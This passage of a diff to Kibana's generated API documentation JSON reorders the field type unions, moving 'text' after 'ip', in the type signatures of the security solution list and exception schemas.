\"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/list_schema/index.ts", "deprecated": false, @@ -3157,7 +3157,7 @@ "label": "ListItemArraySchema", "description": [], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]" + "{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/list_item_schema/index.ts", "deprecated": false, @@ -3185,7 +3185,7 @@ "label": "ListItemSchema", "description": [], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }" + "{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/list_item_schema/index.ts", "deprecated": false, @@ -3213,7 +3213,7 @@ "label": "ListSchema", "description": [], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }" + "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/list_schema/index.ts", "deprecated": false, @@ -3423,7 +3423,7 @@ "label": "NonEmptyEntriesArray", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/non_empty_entries_array/index.ts", "deprecated": false, @@ -3437,7 +3437,7 @@ "label": "NonEmptyEntriesArrayDecoded", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/non_empty_entries_array/index.ts", "deprecated": false, @@ -3829,7 +3829,7 @@ "label": "SearchListItemArraySchema", "description": [], "signature": [ - "{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }[]" + "{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/search_list_item_schema/index.ts", "deprecated": false, @@ -3843,7 +3843,7 @@ "label": "SearchListItemSchema", "description": [], "signature": [ - "{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }" + "{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/search_list_item_schema/index.ts", "deprecated": false, @@ -3983,7 +3983,7 @@ "label": "Type", "description": [], "signature": [ - "\"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"" + "\"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/type/index.ts", "deprecated": false, @@ -3997,7 +3997,7 @@ "label": "TypeOrUndefined", "description": [], "signature": [ - "\"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined" + "\"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/type/index.ts", "deprecated": false, @@ -4053,7 +4053,7 @@ "label": "UpdateEndpointListItemSchema", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_endpoint_list_item_schema/index.ts", "deprecated": false, @@ -4067,7 +4067,7 @@ "label": "UpdateEndpointListItemSchemaDecoded", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; _version: string | undefined; comments: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id: string | undefined; item_id: string | undefined; meta: object | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\"> & { comments: ({ comment: string; } & { id?: string | undefined; })[]; tags: string[]; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" + "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; _version: string | undefined; comments: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id: string | undefined; item_id: string | undefined; meta: object | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\"> & { comments: ({ comment: string; } & { id?: string | undefined; })[]; tags: string[]; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_endpoint_list_item_schema/index.ts", "deprecated": false, @@ -4081,7 +4081,7 @@ "label": "UpdateExceptionListItemSchema", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_schema/index.ts", "deprecated": false, @@ -4095,7 +4095,7 @@ "label": "UpdateExceptionListItemSchemaDecoded", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; _version: string | undefined; comments: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id: string | undefined; item_id: string | undefined; meta: object | undefined; namespace_type: \"single\" | \"agnostic\" | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"namespace_type\" | \"os_types\"> & { comments: ({ comment: string; } & { id?: string | undefined; })[]; tags: string[]; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" + "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; _version: string | undefined; comments: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id: string | undefined; item_id: string | undefined; meta: object | undefined; namespace_type: \"single\" | \"agnostic\" | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"namespace_type\" | \"os_types\"> & { comments: ({ comment: string; } & { id?: string | undefined; })[]; tags: string[]; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_exception_list_item_schema/index.ts", "deprecated": false, @@ -4628,7 +4628,7 @@ "StringC", "; entries: ", "Type", - "<({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | 